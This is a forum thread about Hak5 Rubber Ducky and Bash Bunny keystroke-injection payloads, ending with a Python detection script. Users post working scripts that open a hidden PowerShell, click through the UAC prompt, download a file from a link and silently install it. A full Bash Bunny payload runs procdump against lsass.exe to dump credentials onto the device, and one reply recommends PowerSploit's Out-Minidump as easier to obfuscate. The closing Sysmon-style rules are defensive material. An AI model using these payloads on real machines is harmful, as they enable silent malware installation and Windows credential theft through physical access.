
Run admin Executable


Soultouche


Hi,

There is something I don't understand with the Bash Bunny... I don't know, I feel like it's too hard for my brain to understand how it works compared to the Rubber Ducky, so I need some help.

I have this on a Rubber Ducky; it's pretty basic and does what I want: starting an admin PowerShell, asking for admin and THEN running my command (download a file, output that file and run it quietly).

DELAY 1500
GUI r
DELAY 1000


STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn""


ENTER
DELAY 1000
ALT o
ALT y


So what would be the best way to do that without requiring the download, because the file will be on the Bash Bunny, either inside or on the storage?

THE POWERSHELL HAS TO BE ADMIN or the program won't install correctly.

I can't get it to open an admin PowerShell and then get the drive letter and execute my program all on one line, and ask for approval before actually installing the program (time saver).

Thanks a lot


RUN WIN powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''$DRIVE''').Name+'payloads\\$SWITCH_POSITION\s.msi') /qn"

This is exactly what I have to do, but it's not working because it's not running as admin.


Here's my working code for running an executable (procdump) from the Bunny within PowerShell and then saving the dump file to the Bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special PowerShell operator that evaluates the text following the & character as a command and not a PowerShell object.

LED Y 100

source bunny_helpers.sh

LED B 100
ATTACKMODE HID STORAGE
Q GUI r
Q DELAY 500
Q STRING powershell Start-Process powershell -Verb runAs
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 500
Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q DELAY 500
Q ENTER
Q DELAY 500
Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp
Q ENTER

Q DELAY 200
Q STRING \$driveEject\=New-Object -comObject Shell.Application
Q ENTER
Q DELAY 200
Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 200

Q STRING exit
Q ENTER
LED FINISH


Trying to follow if there are any escaped double quotes. Those double quotes will not translate through Quack. You will have to escape them to show up in the Quack command. Remember, while they are being run from the Bunny payload.txt, they are still running in bash.

@rottingsun

Check out this script in place of using procdump.exe, so you have more flexibility to obfuscate, if it comes down to it, than what you have with a binary.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

As long as you are at or above the access level of the process you are dumping, you can get it. Run it in a high-integrity PowerShell shell and it will work on any process.
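From the defender's side, an added example that is not code from this thread: the chain in rottingsun's payload and the Out-Minidump alternative leave the same traces in Sysmon-style telemetry. The rules below, run over constructed events, flag the `Start-Process powershell -Verb runAs` elevation, the `gwmi win32_volume` label lookup and any non-allowlisted process opening lsass.exe with PROCESS_VM_READ; the event field names follow Sysmon, while the allowlist, sample paths and access masks are assumptions for the example.

```python
import re

# Constructed Sysmon-style events: EID 1 = ProcessCreate (command line), EID 10 = ProcessAccess.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS,
     "CommandLine": "powershell Start-Process powershell -Verb runAs"},
    {"EventID": 1, "Image": PS,
     "CommandLine": "$bunny=(gwmi win32_volume -f 'label=''BashBunny''' "
                    "| Select-Object -ExpandProperty DriveLetter)"},
    {"EventID": 10, "SourceImage": r"E:\payloads\switch1\Procdump\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    # An in-memory dumper (Out-Minidump style) shows up here too, with no procdump.exe on disk.
    {"EventID": 10, "SourceImage": PS,
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\wininit.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
]

PROCESS_VM_READ = 0x0010  # any dump of lsass memory needs this right
# Assumed baseline of legitimate lsass readers; derive the real one from your own telemetry.
LSASS_ALLOWLIST = {r"c:\windows\system32\wininit.exe", r"c:\windows\system32\csrss.exe"}

# Command-line patterns taken from the payloads posted in the thread.
CMDLINE_RULES = [
    ("elevation-via-start-process", re.compile(r"start-process\s+powershell.*-verb\s+runas", re.I)),
    ("removable-volume-lookup", re.compile(r"(gwmi|get-wmiobject)\s+win32_volume\s+-f\S*\s+['\"]?label=", re.I)),
    ("procdump-lsass", re.compile(r"procdump(\.exe)?.*\s-ma\s+lsass", re.I)),
]

def check_event(ev):
    """Return a list of (rule_name, evidence) pairs for a single event."""
    hits = []
    if ev.get("EventID") == 1:
        for name, rx in CMDLINE_RULES:
            if rx.search(ev.get("CommandLine", "")):
                hits.append((name, ev["CommandLine"]))
    elif ev.get("EventID") == 10 and ev["TargetImage"].lower().endswith(r"\lsass.exe"):
        granted = int(ev["GrantedAccess"], 16)
        if ev["SourceImage"].lower() not in LSASS_ALLOWLIST and granted & PROCESS_VM_READ:
            hits.append(("lsass-memory-read", f"{ev['SourceImage']} GrantedAccess={ev['GrantedAccess']}"))
    return hits

def scan(events):
    """Run every rule over a sequence of events and return all hits in order."""
    return [hit for ev in events for hit in check_event(ev)]

if __name__ == "__main__":
    for rule, evidence in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```

Sysmon only emits EID 10 for lsass.exe if its configuration includes ProcessAccess events for that target, so check that before relying on the second rule.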
